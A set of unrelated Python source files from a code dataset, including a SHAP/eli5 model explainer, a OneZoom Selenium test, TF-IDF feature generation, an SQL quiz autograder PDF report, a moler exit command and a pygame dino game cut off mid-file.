:param idx: индекс наблюдения в датасете\n \"\"\"\n ax = shap.force_plot(self.expected_value, self.shap_values[idx,:], self.X.iloc[idx,:],feature_names=self.X.columns.to_list())\n return ax \n\n def to_disc(self, path: str) -> None:\n joblib.dump(self.model, path)\n\n @classmethod\n def from_disc(cls, path: str) -> 'ShapExplainer':\n explainer = joblib.load(path)\n return explainer\n\n# from eli5.sklearn import PermutationImportance\n\n# perm = PermutationImportance(rf).fit(X_train, Y_train)\n# eli5.show_weights(perm, feature_names=X.columns.tolist())\n\n\nclass PermImpExplainer(BaseExplainer):\n \"\"\"Класс PermImpExplainer используется для интерпретации моделей машинного обучения.\n\n Основное применение - интерпретация моделей с помощью Permutation Importance.\n \n Attributes\n ----------\n model : None\n предобученная модель\n x : pd.DataFrame\n данные с признаками (Например: X, X_test, X_train и т.д.)\n y : pd.DataFrame\n данные с таргетом (Например: y, y_test, y_train и т.д.)\n \"\"\"\n\n def __init__(\n self,\n model,\n x: pd.DataFrame,\n y: pd.DataFrame):\n \"\"\"\n Args:\n model: предобученная модель\n x: данные с признаками (Например: X, X_test, X_train и т.д.)\n y: данные с таргетом (Например: y, y_test, y_train и т.д.)\n \"\"\"\n self.model = model\n self.X = x\n self.y = y\n\n def fit(self) -> None:\n \"\"\"\n Метод вычисляет значения параметров, которые используются для интерпретации Permutation Importance.\n \"\"\"\n perm = PermutationImportance(self.model).fit(self.X, self.y)\n self.perm = perm\n\n\n def plot_PIweights(self) -> None:\n \"\"\"\n Метод выводит значения Permutation Importance.\n \"\"\"\n from IPython.display import display\n display(eli5.show_weights(self.perm, feature_names=self.X.columns.tolist())) \n\n def to_disc(self, path: str) -> None:\n joblib.dump(self.model, path)\n\n @classmethod\n def from_disc(cls, path: str) -> 'PermImpExplainer':\n explainer = joblib.load(path)\n return explainer","repo_name":"JustPlatinum/Model-explainer","sub_path":"explainer.py","file_name":"explainer.py","file_ext":"py","file_size_in_byte":10325,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5861651933","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFrom https://github.com/OneZoom/OZtree/issues/62\n\n1) Test no js errors on main page (also that it zooms to the right place) - see http://blog.amolchavan.space/capture-javascript-console-error-using-selenium-webdriver/\n2) Test the iframe popups\n\"\"\"\nimport os.path\nfrom nose import tools\nfrom nose.plugins.skip import SkipTest\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nfrom ...util import base_url, web2py_app_dir\nfrom ..functional_tests import FunctionalTest, make_temp_minlife_file, remove_temp_minlife_files\n\nclass TestTreeDataMismatch(FunctionalTest):\n \"\"\"\n Test whether we get an error page if there is a version mismatch \n This requires a bit of database adjusting, but not too dangerously (we swap 2 numbers, then swap back)\n It is only relevant if we are running a local version of the website\n \"\"\"\n unused_version = 2 # set to a non-allowed (negative) tree version number\n old_version = 1234 #should look up files that exist with an old version number\n\n @classmethod\n def setUpClass(self):\n if not self.is_local:\n raise SkipTest(\"Mismatch test requires altering the DB so can only run locally\")\n print(\"== Running {} 
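ShapExplainer.fit in the record above keeps KernelExplainer affordable by summarising the background data with shap.kmeans before estimating Shapley values. The same recipe on a toy regression; the model and data here are made up:

import numpy as np
import shap
from sklearn.linear_model import LinearRegression

rng = np.random.default_rng(0)
X = rng.random((100, 3))
y = X @ np.array([1.0, -2.0, 0.5])
model = LinearRegression().fit(X, y)

background = shap.kmeans(X, 10)           # 10 centroids instead of 100 rows
explainer = shap.KernelExplainer(model.predict, background)
shap_values = explainer.shap_values(X[:5])
print(np.asarray(shap_values).shape)      # (5, 3): one attribution per sample and feature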
==\".format(os.path.basename(__file__)))\n super().setUpClass() #will assign db etc\n self.temp_minlife = make_temp_minlife_file(self) #must do this before changing table IDs\n print(\">> swapping data in row 1 of ordered_nodes table to force temporary mismatch\")\n db_cursor = self.db['connection'].cursor()\n #parent of row 1 should contain the (negative) version number and real_parent should always be 0\n sql=\"UPDATE ordered_nodes set real_parent = parent where id = 1 LIMIT 1\"\n db_cursor.execute(sql)\n sql=\"UPDATE ordered_nodes set parent = {} where id = 1 LIMIT 1\".format(self.db['subs'])\n db_cursor.execute(sql, (-self.unused_version,)) # versions are stored as negative numbers\n self.db['connection'].commit() #need to commit here otherwise next select returns stale data\n db_cursor.close()\n \n @classmethod\n def tearDownClass(self):\n remove_temp_minlife_files(self)\n print(\">> restoring original version number to root node in database, and setting root node real_parent to 0\")\n db_cursor = self.db['connection'].cursor()\n #parent of row 1 should contain the (negative) version number and real_parent should always be 0\n sql=\"UPDATE ordered_nodes set parent = real_parent WHERE id = 1 AND parent = {} LIMIT 1\".format(self.db['subs'])\n db_cursor.execute(sql, (-self.unused_version,))\n sql=\"UPDATE ordered_nodes SET real_parent = {} where id = 1 LIMIT 1\".format(self.db['subs'])\n db_cursor.execute(sql, (0,)) # real_parent of the root should always be 0\n self.db['connection'].commit() #need to commit here otherwise next select returns stale data\n db_cursor.close()\n super().tearDownClass()\n\n\n @tools.nottest\n def test_mismatch(self, controller, base=base_url):\n self.browser.get(base + controller)\n wait = WebDriverWait(self.browser, 10)\n wait.until(EC.presence_of_element_located((By.ID, \"version-error\")))\n assert \"version {}\".format(self.unused_version) in self.browser.find_element_by_tag_name(\"blockquote\").text, \\\n \"On mismatch, {} tree should show the version number\".format(controller)\n\n def test_life_mismatch(self):\n \"\"\"\n The default tree viewer should show mismatch\n \"\"\"\n #can't go to the top level here beacuse we have set a silly real_parent number (non-existent)\n self.test_mismatch(\"life/@={}\".format(self.humanOTT))\n\n def test_life_MD_mismatch(self):\n \"\"\"\n The museum display viewer should show mismatch\n \"\"\"\n self.test_mismatch(\"life_MD/@={}\".format(self.humanOTT))\n\n def test_expert_mode_mismatch(self):\n \"\"\"\n The expert mode viewer (e.g. with screenshot functionality) should show mismatch\n \"\"\"\n self.test_mismatch(\"life_expert/@={}\".format(self.humanOTT))\n\n def test_AT_mismatch(self):\n \"\"\"\n The Ancestor's Tale tree (different colours) should show mismatch\n \"\"\"\n self.test_mismatch(\"AT/@={}\".format(self.humanOTT))\n\n def test_trail2016_mismatch(self):\n \"\"\"\n The Ancestor's Trail tree (different sponsorship details) should show mismatch\n \"\"\"\n self.test_mismatch(\"trail2016/@={}\".format(self.humanOTT))\n\n def test_linnean_mismatch(self):\n \"\"\"\n The Linnean Soc tree (different sponsorship details) should show mismatch\n \"\"\"\n self.test_mismatch(\"linnean/@={}\".format(self.humanOTT))\n\n def test_text_tree_mismatch(self):\n \"\"\"\n The text-only tree (e.g. 
for humans=ott 770315) should still work, as it does not require files to match the db version\n \"\"\"\n self.browser.get(base_url + \"life_text/@={}\".format(self.humanOTT))\n assert self.element_by_class_exists('text_tree'), \"Should have the text tree in a labelled div\"\n assert self.element_by_class_exists('species'), \"Should have the species in a labelled div\"\n\n def test_text_tree_root_absent(self):\n \"\"\"\n TO DO --- Should the text-only tree should be missing the root node? Depends on what we expect. Needs more thought\n \"\"\"\n self.browser.get(base_url + \"life_text/@={}\".format(self.mammalOTT))\n assert self.element_by_class_exists('text_tree'), \"Should have the text tree in a labelled div\"\n #assert not self.element_by_class_exists('text_tree_root'), \"Should not have the root of the text tree\"\n\n def test_minlife_available(self):\n \"\"\"\n The minlife view for restricted installation should show mismatch error\n \"\"\"\n self.test_mismatch(\"treeviewer/minlife\".format(self.humanOTT))\n\n def test_minlife_static(self):\n \"\"\"\n The temporary minlife file in static should show a mismatch error\n \"\"\"\n self.test_mismatch(self.temp_minlife, \"file://\")\n\n def test_minlife_old_download(self):\n \"\"\"\n Check what happens if the downloaded minlife version is an old one that does not match the version in the API\n Here we should set the \n \"\"\"\n #make a minlife file with the bad (\"unused_version\") number\n old_minlife = make_temp_minlife_file(self)\n ","repo_name":"OneZoom/OZtree","sub_path":"tests/functional/treeviewer/test_tree_data_mismatch.py","file_name":"test_tree_data_mismatch.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"78"} +{"seq_id":"31781017744","text":"adventure ={\n \"name\" : \"Light\",\n \"age\" : 17,\n \"strength\" : 8,\n \"defense\" : 10,\n \"Hp\" : 100,\n \"backpack\" : [\"shield\", \"bread loaf\"],\n \"gold\" : 100,\n \"level\" : 2\n}\nadventure[\"gold\"] +=50\nadventure[\"backpack\"].append(\"flintstone\")\nadventure[\"pocket\"]=[\"monsterdex\", \"flashlight\"]\nprint(adventure)\n","repo_name":"phanhr/c4t-20","sub_path":"hack3/part7.py","file_name":"part7.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31747285274","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import OneHotEncoder,LabelEncoder,StandardScaler\r\nfrom sklearn.decomposition import TruncatedSVD,PCA\r\nfrom sklearn.metrics.pairwise import cosine_similarity, pairwise_distances\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nseed = 1024\r\nnp.random.seed(seed)\r\npath = \"model/\"\r\n\r\ndef calc_cosine_dist(text_a ,text_b):\r\n #return pairwise_distances(text_a, text_b, metric='cosine')[0][0]\r\n #y = cosine_similarity(text_a, text_b)[0][0]\r\n y = pairwise_distances(text_a, text_b, metric='l2')[0][0]\r\n return y\r\n\r\n\r\n\r\n\r\nprint('Tfidf word Similarity part')\r\n\r\ntrain_question1_tfidf = pd.read_pickle(path+'train_word1_bigram_tfidf_v2.pkl')\r\ntest_question1_tfidf = pd.read_pickle(path+'test_word1_bigram_tfidf_v2.pkl')\r\ntrain_question2_tfidf = pd.read_pickle(path+'train_word2_bigram_tfidf_v2.pkl')\r\ntest_question2_tfidf = pd.read_pickle(path+'test_word2_bigram_tfidf_v2.pkl')\r\n\r\ntrain_tfidf_sim = []\r\nfor r1,r2 in zip(train_question1_tfidf,train_question2_tfidf):\r\n 
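test_mismatch in the OneZoom record above is the standard explicit-wait pattern: load a page, then block until a marker element appears or the timeout fires. Reduced to its core; the URL and driver choice are placeholders:

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait

browser = webdriver.Firefox()                   # any installed driver works
try:
    browser.get("http://localhost:8000/life")   # placeholder URL
    WebDriverWait(browser, 10).until(
        EC.presence_of_element_located((By.ID, "version-error")))
    print("mismatch banner rendered")
finally:
    browser.quit()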
train_tfidf_sim.append(calc_cosine_dist(r1,r2))\r\ntest_tfidf_sim = []\r\nfor r1,r2 in zip(test_question1_tfidf,test_question2_tfidf):\r\n test_tfidf_sim.append(calc_cosine_dist(r1,r2))\r\ntrain_tfidf_sim = np.array(train_tfidf_sim)\r\ntest_tfidf_sim = np.array(test_tfidf_sim)\r\nX = pd.DataFrame()\r\nY=pd.DataFrame()\r\nX[\"tfidf_word_bigram_sim\"]=train_tfidf_sim\r\nY[\"tfidf_word_bigram_sim\"]=test_tfidf_sim\r\n\r\nprint(X)\r\n\r\n\r\ndel train_question1_tfidf\r\ndel test_question1_tfidf\r\ndel train_question2_tfidf\r\ndel test_question2_tfidf\r\n\r\nprint('Tfidf char Similarity part')\r\ntrain_question1_bigram_tfidf = pd.read_pickle(path+'train_char1_bigram_tfidf_v2.pkl')\r\ntest_question1_bigram_tfidf = pd.read_pickle(path+'test_char1_bigram_tfidf_v2.pkl')\r\ntrain_question2_bigram_tfidf = pd.read_pickle(path+'train_char2_bigram_tfidf_v2.pkl')\r\ntest_question2_bigram_tfidf = pd.read_pickle(path+'test_char2_bigram_tfidf_v2.pkl')\r\n\r\ntrain_bigram_tfidf_sim = []\r\nfor r1,r2 in zip(train_question1_bigram_tfidf,train_question2_bigram_tfidf):\r\n train_bigram_tfidf_sim.append(calc_cosine_dist(r1,r2))\r\ntest_bigram_tfidf_sim = []\r\nfor r1,r2 in zip(test_question1_bigram_tfidf,test_question2_bigram_tfidf):\r\n test_bigram_tfidf_sim.append(calc_cosine_dist(r1,r2))\r\ntrain_bigram_tfidf_sim = np.array(train_bigram_tfidf_sim)\r\ntest_bigram_tfidf_sim = np.array(test_bigram_tfidf_sim)\r\n# pd.to_pickle(train_bigram_tfidf_sim,path+\"train_bigram_tfidf_sim.pkl\")\r\n# pd.to_pickle(test_bigram_tfidf_sim,path+\"test_bigram_tfidf_sim.pkl\")\r\nX[\"tfidf_char_bigram_sim\"]=train_bigram_tfidf_sim\r\nY[\"tfidf_char_bigram_sim\"]=test_bigram_tfidf_sim\r\ndel train_question1_bigram_tfidf\r\ndel test_question1_bigram_tfidf\r\ndel train_question2_bigram_tfidf\r\ndel test_question2_bigram_tfidf\r\nX.to_csv('feature/tfidf_sim_l2_bigram_train.csv', index=False)\r\nY.to_csv('feature/tfidf_sim_l2_bigram_test.csv', index=False)","repo_name":"CortexFoundation/paipaidai-rank10","sub_path":"features/generate_tfidf_feature_2.py","file_name":"generate_tfidf_feature_2.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"70374230331","text":"def subarr(arr, n):\n\tsum = 0\n\ts = set()\n\n\tfor i in range(n):\n\t\tsum += arr[i]\n\t\tif sum == 0 or sum in s:\n\t\t\treturn True\n\t\ts.add(sum)\n\n\treturn False\n\n\narr = [4, 2, -3, 1, 6]\nn = len(arr)\nif subarr(arr, n) == True:\n\tprint(\"Found a sunbarray with sum 0\")\nelse:\n\tprint(\"No Such sub array exits!\")","repo_name":"9syed/Python-Problems-Solving","sub_path":"Subarray with 0 sum.py","file_name":"Subarray with 0 sum.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40541282571","text":"from sqlalchemy import create_engine, text\nfrom fpdf import FPDF, XPos, YPos\nfrom grader import *\nimport time\n\n# engine = create_engine(\"mysql+pymysql://sql12658112:yFlLxXMggz@sql12.freemysqlhosting.net/sql12658112\")\n# connection = engine.connect()\n\n\nstart_time = time.time()\n\nquestions = [ \n \"List all the students with their email addresses.\",\n \"Find the total number of students enrolled in each course.\",\n \"Provide the names of instructors along with the courses they teach.\",\n# \"Get all the assignments due in the next 30 days.\",\n# \"Identify the students who are not enrolled in any courses.\",\n# \"Display the courses along with the names of 
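One detail worth noticing in the feature script above: calc_cosine_dist keeps the cosine_similarity call commented out and actually returns pairwise_distances(..., metric='l2'), so the columns named *_sim hold Euclidean distances, not cosine similarities. The two disagree even on trivial vectors:

import numpy as np
from sklearn.metrics.pairwise import cosine_similarity, pairwise_distances

a = np.array([[1.0, 0.0]])
b = np.array([[0.0, 1.0]])
print(pairwise_distances(a, b, metric="l2")[0][0])   # 1.4142..., what the script stores
print(cosine_similarity(a, b)[0][0])                 # 0.0, what the name promises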
students enrolled and their enrollment dates.\",\n \"Retrieve all blogger names and their email addresses.\",\n \"List all blog posts along with their corresponding blogger names.\",\n# \"Find the number of comments made on each blog post.\",\n# \"Get the most recent comments for each blog post.\",\n# \"Display all comments made by a specific blogger.\",\n# \"Show the titles of blog posts that do not have any comments.\"\n ]\n\nc_queries = [\n \"SELECT FirstName, LastName, Email FROM Student;\",\n \"SELECT CourseID, COUNT(StudentID) AS NumberOfStudents FROM Enrollment GROUP BY CourseID;\",\n \"SELECT i.InstructorName, c.CourseName FROM Instructor i JOIN Course c ON i.InstructorID = c.InstructorID GROUP BY CourseID ORDER BY CourseID;\",\n# \"SELECT AssignmentName, DueDate FROM Assignment WHERE DueDate BETWEEN CURRENT_DATE AND CURRENT_DATE + INTERVAL '30' DAY;\",\n# \"SELECT * FROM Student WHERE StudentID NOT IN (SELECT StudentID FROM Enrollment);\",\n# \"SELECT c.CourseName, s.FirstName, s.LastName, e.EnrollmentDat FROM Course c JOIN Enrollment e ON c.CourseID = e.CourseID;\",\n \"SELECT BloggerName, Email FROM Blogger;\",\n \"SELECT b.BloggerName, bp.Title, bp.Conte FROM Blogger b JOIN BlogPost bp ON b.BloggerID = bp.Blogg;\",\n# \"SELECT bp.BlogP, bp.Title, COUNT(c.CommentID) AS NumberOfComments FROM BlogPost bp LEFT JOIN Comment c ON bp.BlogP = c.BlogPostID GROUP BY bp.BlogP;\",\n# \"SELECT bp.BlogP, bp.Title, c.CommentConte, c.CommentDate FROM BlogPost bp JOIN Comment c ON bp.BlogP = c.BlogPostID WHERE c.CommentDate IN (SELECT MAX(CommentDate) FROM Comment GROUP BY BlogPostID);\",\n# \"SELECT c.comment_cntnts, c.CommentDate FROM Comment c WHERE c.BloggerID = 30;\", \n# \"SELECT Title FROM BlogPost WHERE BlogP NOT IN (SELECT BlogPostID FROM Comment);\"\n]\n\nstu_queries = [\n \"SELECT first_name, last_name, Email_addr FROM Students;\",\n \"SELECT CourseID, COUNT(StudentID) AS NumberOfStudents FROM Enrollment ORDER BY CourseID;\",\n \"SELECT i.InstructorName, c.CourseName FROM Instructors i LEFT JOIN Courses c ON i.InstructorID = c.InstructorID\",\n# \"SELECT AssignmentName, DueDate FROM Assignment WHERE DueDate BETWEEN CURRENT_DATE AND CURRENT_DATE + INTERVAL '30' DAY;\",\n# \"SELECT * FROM Student WHERE StudentID NOT IN (SELECT StudentID FROM Enrollment);\",\n# \"SELECT c.CourseName, s.FirstName, s.LastName, e.EnrollmentDat FROM Course c INNER JOIN Enrollment e ON c.CourseID = e.CourseID;\",\n \"SELECT BloggerName, Email FROM Blogger;\",\n \"SELECT b.BloggerName, bp.Title FROM Blogger b JOIN BlogPost bp ON b.BloggerID = bp.Blogg;\",\n# \"SELECT bp.BlogP, bp.Title, COUNT(c.CommentID) AS NumberOfComments FROM BlogPost bp RIGHT JOIN Comment c ON bp.BlogP = c.BlogPostID ORDER BY bp.BlogP;\",\n# \"SELECT bp.BlogP, bp.Title, c.CommentConte, c.CommentDate FROM BlogPost bp JOIN Comment c ON bp.BlogP = c.BlogPostID WHERE c.CommentDate IN (SELECT MAX(CommentDate) FROM Comment GROUP BY BlogPostID);\",\n# \"SELECT c.CommentConte, c.CommentDate FROM Comment c WHERE c.BloggerID = 10;\", \n# \"SELECT Title FROM BlogPost WHERE BlogP NOT IN (SELECT BlogPostID FROM Comment);\"\n]\n\nend_time = time.time()\n\nprint(f\"Total time taken for grader: {end_time - start_time}\")\n\ntitle = \"Quiz Results\"\n\nclass PDF(FPDF):\n\n def set_page_margin(self):\n self.set_margin(20)\n \n\n def header(self):\n self.image(r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\images\\DataWiz-Logo.png', 10, 8, 16)\n self.set_font('Gilroy-Bold', '', 20)\n self.set_text_color(0, 0, 0)\n\n title_w = 
self.get_string_width(title) + 6\n doc_w = self.w\n self.set_x((doc_w - title_w)/2)\n\n self.set_line_width(1)\n\n self.cell(title_w, 10, title, align='C')\n self.ln(30)\n\n\n def footer(self):\n self.set_y(-15)\n self.set_font('Gilroy-MediumItalic', '', 10)\n self.set_text_color(169, 169, 169)\n self.cell(0, 10, f'Page {self.page_no()}', align='C')\n\n def question(self, num, qs):\n self.set_font('Gilroy-SemiBold', '', 14)\n self.set_fill_color(220, 207, 216)\n\n length = len(str(num)) + 70\n question = f'Question {num}'\n self.cell(length, 8, question, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=1)\n \n self.set_font('Gilroy-Regular', '', 12)\n self.set_fill_color(255, 244, 214)#(200, 220, 255)\n question = f'{qs}'\n self.multi_cell(0, 5, question, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=1)\n self.ln()\n\n def teacher_ans(self, question_answer):\n student_ans = f\"Correct Answer: \"\n self.set_font('Gilroy-Light', '', 11)\n self.cell(0, 7, student_ans, new_x=\"LMARGIN\", new_y=\"NEXT\")\n\n self.set_font('Gilroy-Regular', '', 13)\n self.multi_cell(0, 6, question_answer, new_x=\"LMARGIN\", new_y=\"NEXT\")\n self.ln()\n \n def student_ans(self, question_answer):\n student_ans = f\"Student Answer: \"\n self.set_font('Gilroy-Light', '', 11)\n self.cell(0, 7, student_ans, new_x=\"LMARGIN\", new_y=\"NEXT\")\n \n self.set_font('Gilroy-Regular', '', 13)\n # self.set_fill_color(169, 169, 169)\n self.multi_cell(0, 6, question_answer, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=0)\n self.ln()\n\n def autograding_results(self, result, score):\n autograder_text = f\"Autograding Results: \"\n self.set_font('Gilroy-Light', '', 11)\n self.cell(0, 7, autograder_text, new_x=\"LMARGIN\", new_y=\"NEXT\")\n \n self.set_font('Gilroy-Regular', '', 12)\n self.set_fill_color(224, 224, 225)#(221, 221, 221)\n self.multi_cell(0, 6, result, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=1)\n self.ln()\n\n self.set_font('Gilroy-Medium', '', 13)\n self.set_fill_color(224, 224, 225)#(221, 221, 221)\n scorer = f\"Score: {score}\"\n self.cell(0, 6, scorer, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=1)\n self.ln()\n \n \n def print_qs_set(self, ques_num, ques, ques_ans, stu_ans, result, score):\n self.question(ques_num, ques)\n self.ln()\n self.teacher_ans(ques_ans)\n self.student_ans(stu_ans)\n self.ln()\n self.autograding_results(result, score)\n self.ln()\n\n \n\n\npdf = PDF('P', 'mm', 'A4')\n\npdf.add_font('Gilroy-Black', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Black.ttf')\npdf.add_font('Gilroy-Bold', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Bold.ttf')\npdf.add_font('Gilroy-ExtraBold', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-ExtraBold.ttf')\npdf.add_font('Gilroy-Heavy', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Heavy.ttf')\npdf.add_font('Gilroy-Light', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Light.ttf')\npdf.add_font('Gilroy-Medium', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Medium.ttf')\npdf.add_font('Gilroy-MediumItalic', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-MediumItalic.ttf')\npdf.add_font('Gilroy-Regular', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Regular.ttf')\npdf.add_font('Gilroy-SemiBold', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-SemiBold.ttf')\npdf.add_font('Gilroy-Thin', '', 
r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Thin.ttf')\n\npdf.add_page()\npdf.set_page_margin()\npdf.set_auto_page_break(auto = True, margin = 15)\n\nfor i in range(0, len(questions)):\n print(f\"FISH: {c_queries[i]}\")\n score, result = auto_grader(c_queries[i], stu_queries[i])\n pdf.print_qs_set(i+1, questions[i], c_queries[i], stu_queries[i], result, score)\n\n\n\npdf.output('quiz_2.pdf')","repo_name":"desracto/DataWiz-Again","sub_path":"app/scripts/pdf_generate.py","file_name":"pdf_generate.py","file_ext":"py","file_size_in_byte":8303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40341259610","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExit command module.\n\"\"\"\n\n__author__ = 'Michal Ernst, Marcin Usielski'\n__copyright__ = 'Copyright (C) 2018-2023, Nokia'\n__email__ = 'michal.ernst@nokia.com, marcin.usielski@nokia.com'\n\n\nfrom moler.cmd.commandchangingprompt import CommandChangingPrompt\n\n\nclass Exit(CommandChangingPrompt):\n def __init__(self, connection, prompt=None, expected_prompt='>', newline_chars=None, runner=None,\n target_newline=\"\\n\", allowed_newline_after_prompt=False, start_command_immediately=True):\n \"\"\"\n :param connection: connection to device.\n :param expected_prompt: prompt on device changed by this command.\n :param prompt: expected prompt sending by device after command execution. Maybe String or compiled re.\n :param newline_chars: new line chars on device (a list).\n :param runner: runner to run command.\n :param target_newline: newline on device when command is finished and prompt is changed.\n :param start_command_immediately: set True to set command_started before execution, False otherwise\n \"\"\"\n super(Exit, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner,\n expected_prompt=expected_prompt, target_newline=target_newline,\n allowed_newline_after_prompt=allowed_newline_after_prompt)\n self._cmd_output_started = start_command_immediately\n\n def build_command_string(self):\n \"\"\"\n Returns a string with command.\n\n :return: String with the command.\n \"\"\"\n cmd = \"exit\"\n return cmd\n\n\nCOMMAND_OUTPUT = \"\"\"\namu012@belvedere07:~$ exit\nbash-4.2:~ #\"\"\"\n\nCOMMAND_KWARGS = {\n \"expected_prompt\": r'bash-4.2'\n}\n\nCOMMAND_RESULT = {}\n","repo_name":"nokia/moler","sub_path":"moler/cmd/unix/exit.py","file_name":"exit.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"34801236891","text":"import pygame\nimport sys\nimport os\nfrom time import sleep\n \npygame.init()\npygame.display.set_caption('Jumping dino')\n\nMAX_WIDTH = 800\nMAX_HEIGHT = 400\nRED = (255, 0, 0)\nbase = os.path.dirname(sys.argv[0])\n\n\nclass Dino(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.dinoImage = pygame.image.load(os.path.join(base, 'images/dino1.png'))\n self.dinoImage2 = pygame.image.load(os.path.join(base, 'images/dino2.png'))\n self.rect = self.dinoImage.get_rect()\n self.rect.centerx = 50\n self.rect.centery = 358\n self.width = self.rect.size[0]\n self.height = self.rect.size[1]\n self.dino_bottom = MAX_HEIGHT - self.height\n self.x_position = 50\n self.y_position = MAX_HEIGHT - self.height\n self.jump_top = 200\n self.is_bottom = True\n self.is_go_up = False\n self.leg_swap = True\n\nclass Tree(pygame.sprite.Sprite):\n def __init__(self):\n 
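The PDF class in the pdf_generate record above customises fpdf2 by overriding header and footer, which the library calls automatically on every add_page. A stripped-down version using the built-in Helvetica face so it runs without the Gilroy font files:

from fpdf import FPDF

class ReportPDF(FPDF):
    def header(self):
        # drawn automatically at the top of every page
        self.set_font("helvetica", "B", 14)
        self.cell(0, 10, "Quiz Results", align="C", new_x="LMARGIN", new_y="NEXT")

    def footer(self):
        # drawn automatically 15 mm from the bottom of every page
        self.set_y(-15)
        self.set_font("helvetica", "I", 8)
        self.cell(0, 10, f"Page {self.page_no()}", align="C")

pdf = ReportPDF("P", "mm", "A4")
pdf.add_page()
pdf.set_font("helvetica", size=12)
pdf.multi_cell(0, 6, "Question 1\nSELECT FirstName, LastName, Email FROM Student;")
pdf.output("demo.pdf")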
pygame.sprite.Sprite.__init__(self)\n self.imgTree = pygame.image.load(os.path.join(base, 'images/tree.png'))\n self.rect = self.imgTree.get_rect()\n self.width = self.rect.size[0]\n self.height = self.rect.size[1]\n self.tree_x_left = MAX_WIDTH\n self.tree_y = MAX_HEIGHT - self.height\n self.rect.centerx = MAX_WIDTH\n self.rect.centery = MAX_HEIGHT - self.height\n\n\ndef main():\n dino = Dino()\n tree = Tree()\n running = True\n finish = False\n start_ticks = pygame.time.get_ticks()\n game_font = pygame.font.Font(None,40)\n\n # set screen, fps\n screen = pygame.display.set_mode((MAX_WIDTH, MAX_HEIGHT))\n fps = pygame.time.Clock()\n\n large_font = pygame.font.SysFont(None, 72)\n while not finish:\n while running:\n screen.fill((255, 255, 255))\n\n # tree move\n tree.tree_x_left -= 12.0\n tree.rect.centerx = tree.tree_x_left\n\n if tree.tree_x_left <= -27:\n tree.tree_x_left = MAX_WIDTH\n tree.rect.centerx = tree.tree_x_left\n\n # draw tree\n screen.blit(tree.imgTree, (tree.tree_x_left, tree.tree_y))\n\n event = pygame.event.poll() # 이벤트 처리\n if event.type == pygame.QUIT:\n running = False\n finish = True \n pygame.quit()\n sys.exit()\n break\n pressed = pygame.key.get_pressed()\n if pressed[pygame.K_SPACE]: # spacebar is jump\n if dino.is_bottom:\n dino.is_go_up = True\n dino.is_bottom = False\n\n # dino jump\n if dino.is_go_up:\n dino.y_position -= 10.0\n dino.rect.centery = dino.y_position\n\n elif not dino.is_go_up and not dino.is_bottom:\n dino.y_position += 10.0\n dino.rect.centery = dino.y_position\n\n if dino.is_go_up and dino.y_position <= dino.jump_top:\n dino.is_go_up = False\n\n if not dino.is_bottom and dino.y_position >= dino.dino_bottom:\n dino.is_bottom = True\n dino.y_position = dino.dino_bottom\n\n # draw dino\n if dino.leg_swap:\n screen.blit(dino.dinoImage, (dino.x_position, dino.y_position))\n dino.leg_swap = False\n else:\n screen.blit(dino.dinoImage2, (dino.x_position, dino.y_position))\n dino.leg_swap = True\n\n screen.blit(dino.dinoImage, (dino.x_position, dino.y_position))\n\n # dino tree collision\n if pygame.sprite.collide_rect(dino, tree):\n success_image = large_font.render('Failure', True, RED)\n current_time = pygame.time.get_ticks() #\n elapsed_time = ( current_time - start_ticks )/1000 # \n timer = game_font.render(str(int(elapsed_time)),True,(255,255,255))\n running = False\n\n # update\n pygame.display.update()\n fps.tick(30)\n \n screen.blit(success_image, (MAX_WIDTH // 2 - success_image.get_width() // 2, MAX_HEIGHT // 2 - success_image.get_height() // 2)) \n screen.blit(timer,(10,10))\n pygame.display.update()\n fps.tick(30)\n event = pygame.event.poll() # 이벤트 처리\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n break\n \nif __name__ == '__main__':\n 